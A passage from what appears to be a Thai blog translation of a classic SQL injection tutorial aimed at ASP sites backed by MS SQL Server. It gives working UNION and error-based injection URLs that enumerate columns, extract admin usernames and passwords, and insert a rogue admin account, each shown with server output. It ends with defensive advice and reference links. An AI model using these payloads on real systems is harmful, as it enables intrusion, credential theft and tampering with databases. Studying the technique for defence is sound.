Driver][SQL Server]Syntax error converting the nvarchar value ‘admin_login’ to a column of data type int./index.asp, line 5ข้อความ ‘%25login%25′ จะถูกมองเห็นเป็น %login% ใน SQL server ในกรณีนี้เราก็จะได้ตารางชื่อ “admin_login”มาแล้ว
6.1 เราจะทำเหมืองข้อมูล(กรรมวิธีที่ใช้ในการแยกแยะข้อมูลเป็น DB)เกี่ยวกับชื่อ column ในตารางทั้งหมดได้ยังไงเราสามารถใช้ประโยชน์อีกอย่างหนึ่งจาก INFORMATION_SCHEMA.COLUMNS เพื่อแสดงชื่อ columnsทั้งหมดออกมา :http://duck/index.aspid=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’admin_login’–ผลที่ได้คือ :Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘login_id’ to a column of data type int./index.asp, line 5จากผลที่ได้นี้ เราก็จะได้ชื่อ column แรกมา เรายังสามารถใช้ NOT IN () เพื่อจะได้ชื่อ column ถัดไปดังนี้ :http://duck/index.aspid=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’admin_login’ WHERE COLUMN_NAME NOT IN (’login_id’)–ซึ่งผลที่ได้คือMicrosoft OLE DB Provider for ODBC Drivers error ‘80040e07′[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘login_name’ to a column of data type int./index.asp, line 5เมื่อเราทำไปเรื่อยๆเราก็จะเจอชื่อ column เช่น “password”, “details” ซึ่งเราจะรู้ได้ว่าเจอแล้วเมื่อปรากฏข้อความ error ดังนี้http://duck/index.aspid=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’admin_login’ WHERE COLUMN_NAME NOT IN (’login_id’,'login_name’,'password’,details’)–ผลที่ได้คือMicrosoft OLE DB Provider for ODBC Drivers error ‘80040e14′[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator./index.asp, line 5
6.2 ทำไงถึงจะได้มาซึ่งข้อมูลทุกอย่างตอนนี้เราสามารถระบุชื่อและcolumn ของตารางที่สำคัญๆ ได้แล้ว เราก็ยังคงใช้เทคนิคเดียวกันนี้กับข้อมูลอื่นๆที่เราต้องการจากฐานข้อมูลมองลองเอาชื่อ login_name จากตาราง “admin_login” กัน :http://duck/index.aspid=10 UNION SELECT TOP 1 login_name FROM admin_login–ผลที่ได้จากด้านบนคือMicrosoft OLE DB Provider for ODBC Drivers error ‘80040e07′[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘neo’ to a column of data type int./index.asp, line 5ที่นี้เราก็จะรู้ชื่อของ admin ที่มี login_name ว่า “neo” สุดท้าย เอา pass ของ “neo” มาจาก DB :http://duck/index.aspid=10 UNION SELECT TOP 1 password FROM admin_login where login_name=’neo’–ผลที่ได้คือMicrosoft OLE DB Provider for ODBC Drivers error ‘80040e07′[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘m4trix’ to a column of data type int./index.asp, line 5เราก็จะสามารถ login ได้โดยใช้ user เป็น neo และ passwrod เป็น m4trix
6.3 วิธีที่จะได้มาซึ่งค่า numeric string (ข้อความที่เป็นตัวเลข…อันนี้ต้องเคยเขียนโปรแกรมจึงจะเข้าใจประเภทของตัวแปร)ค่อนข้างจะมีข้อจำกัดสำหรับเทคนิคนี้ คือเราไม่สามารถทำ error message ได้ถ้าต้องการจะ แปลงข้อความเป็นตัวเลขล้วนๆ พูดง่ายๆ คือ หากเราต้องการจะเอา pass ของคนที่ชื่อ “trinity” ซึ่งเขามี pass เป็น “31173″ ซึ่งเป็นตัวเลขทั้งหมด :http://duck/index.aspid=10 UNION SELECT TOP 1 password FROM admin_login where login_name=’trinity’–เราจะพบว่า ผลที่ได้จะเจอกับ “Page Not Found” เพราะ “31173″ ซึ่งเป็น string จะถูกแปลงไปเป็น numberก่อนที่จะทำการ UNION กับจำนวนเต็มดังกล่าว (ในที่นี้คือ 10) และหากว่าการ UNION ใช้ได้หรือถูกต้องนั้น SQL server จะไม่ส่ง error message ออกมา ดังนั้น เราจะไม่สามารถมองเห็นค่าตัวเลขใดๆ เลย (อืมข้อนี้น่าสนใจ เอาไว้ใช้เวลาตั้ง pass สำหรับadmin ได้นะ)การแก้ปัญหานี้ เราสามารถเชื่อมโยง numeric string กับ ตัวอักษรบางตัวแทน ซึ่งต้องมั่นใจว่าการแปลงนั้นส่งผลผิดพลาดแน่นอน(เพื่อจะให้ server ส่ง error message ออกมา) เรามาลองคำสั่งนี้แทน :http://duck/index.aspid=10 UNION SELECT TOP 1 convert(int, password%2b’%20morpheus’) FROM admin_login where login_name=’trinity’–เราใช้เครื่องหมาย + เพิ่มเข้าไปใน passwd กับ ตัวอักษร ที่เราต้องการ (รหัส ASSCII สำหรับเครื่องหมาย ‘+’ คือ 0×2b)เรายังเพิ่ม ‘(ช่องว่าง)morpheus’ เข้าไปในช่อง passwd ด้วย เพราะฉะนั้นเมื่อเรามีเลข ‘31173′ มันจะกลายเป็น ‘31173 morpheus’โดยปกติเรียกกันว่าฟังก์ชั่น convert() ซึ่งจะพยายามแปลง ‘31173 morpheus’ ไปเป็นตัวเลขซึ่งจะทำให้ SQL server ส่งerror message ออกมาดังนี้ :Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘31173 morpheus’ to a column of data type int./index.asp, line 5คราวนี้คุณก็สามารถ login ได้โดยใช้ passwd เป็น ‘31173′
7.0 แล้วเราจะสามารถ update/insert ข้อมูลลงไปใน DB ได้รึป่าวถ้าเรารู้ชื่อของตารางและ column แล้วมันก็เป็นไปได้ที่เราจะสามารถใช้คำสั่ง UPDATE หรือ INSERT ข้อมูลลงไปในตารางได้ ยกตัวอย่างเช่น การเปลี่ยน passwd ของคนที่ชื่อ “neo” (แปลมาถึงตรงนี้เห็นได้ว่า คนเขียนบ้าหนังเรื่อง Matrixพอสมควร) ทำได้ดังนี้ :http://duck/index.aspid=10; INSERT INTO ‘admin_login’ (’login_id’, ‘login_name’, ‘password’, ‘details’) VALUES (666,’neo2′,’newpas5′,’NA’)–ทีนี่เราก็จะสามารถ login ได้ในชื่อ neo2 และ pass คือ newpas5
8.0 แล้วจะหลีกเลี่ยงวิธีนี้ได้ไงอะกรองตัวอักษรเช่น single quote, double quote, slash, back slash, semi colon extended ตัวอักษรเช่น NULL การ enter การขึ้นบรรทัดใหม่ ฯลฯ ที่เข้ามาในรูป String :?- จาก Input ของ users?- ค่า Parameters จาก URL?- ค่าจากตัวแปร cookieสำหรับค่าทีเป็นตัวเลขให้แปลงเป็น จำนวนเต็มก่อนที่จะวางลงไปในคำสั่ง SQL หรือจะใช้คำสั่ง ISNUMERIC เพื่อให้แน่ใจว่าเป็นตัวเลขจำนวนเต็มเปลี่ยน “Startup and run SQL Server” โดยปรับ privilege ให้อยู่ในระดับ low ใน SQL Server Security tabลบ stored procedures ที่ไม่ใช้แล้วทิ้ง เช่น :master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
9.0 ข้อมูลเพิ่มเติมในช่วงแรกๆ ในการทำงานเรื่อง SQL Injection นี้ เราได้ค้นพบเอกสารจากเวป Rain Forest Puppy เกี่ยวกับการ hackด้วยวิธี PacketStrom :http://www.wiretrip.net/rfp/p/doc.aspid=42&iface=6
บทความดีๆ เกี่ยวกับ ODBC error message :http://www.blackhat.com/presentations/win-usa-01/Litchfield/BHWin01Litchfield.doc
บทสรุปดีๆ สำหรับ SQL Injection ในหลายๆ SQL serverhttp://www.owasp.org/asac/input_validation/sql.shtml
บทความของ Sensepost เกี่ยวกับ SQL Injectionhttp://www.sensepost.com/misc/SQLinsertion.htm
อื่นๆ เพิ่มเติมhttp://www.digitaloffense.net/wargames01/IOWargames.ppthttp://www.wiretrip.net/rfp/p/doc.aspid=7&iface=6http://www.wiretrip.net/rfp/p/doc.aspid=60&iface=6http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf
1 Comment:
ว้าว สุดยอดไปเลย เพ่ ๆๆๆ อ่านของเพ่ไปแล้ว
แสดงความคิดเห็น